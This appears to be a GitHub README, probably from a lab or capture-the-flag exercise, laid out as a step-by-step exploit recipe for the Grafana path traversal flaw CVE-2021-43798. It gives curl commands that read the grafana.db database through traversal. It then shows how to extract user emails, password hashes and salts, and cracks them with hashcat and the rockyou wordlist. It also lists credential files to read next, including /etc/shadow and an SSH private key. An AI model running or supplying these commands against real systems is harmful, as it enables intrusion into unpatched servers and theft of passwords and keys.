Chain CVE-2021-43798 with grafana.db files

Get the database using CVE-2021-43798 curl 'http://10.10.77.156:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' --path-as-is --output grafana.db
Query the database and extract email, password and salt select email,password,salt from user;
Save that output to a file (look at hashes.txt)
Run decoder.py script python3 decoder.py > hash
Run hashcat to crack the passwords hashcat -m 10900 hash /usr/share/wordlists/rockyou.txt

Interesting files to analyze if the above does not work

/etc/passwd
/etc/shadow
/etc/hostname
/etc/grafana/grafana.ini
/home/grafana/.ssh/id_rsa
/var/lib/grafana/grafana.db
-> curl -o grafana.db --path-as-is http://10.9.49.222:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

Sources

https://www.vulncheck.com/blog/grafana-cve-2021-43798

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Chain CVE-2021-43798 with grafana.db files

Interesting files to analyze if the above does not work

Sources

Files

README.md

Latest commit

History

README.md

File metadata and controls

Chain CVE-2021-43798 with grafana.db files

Interesting files to analyze if the above does not work

Sources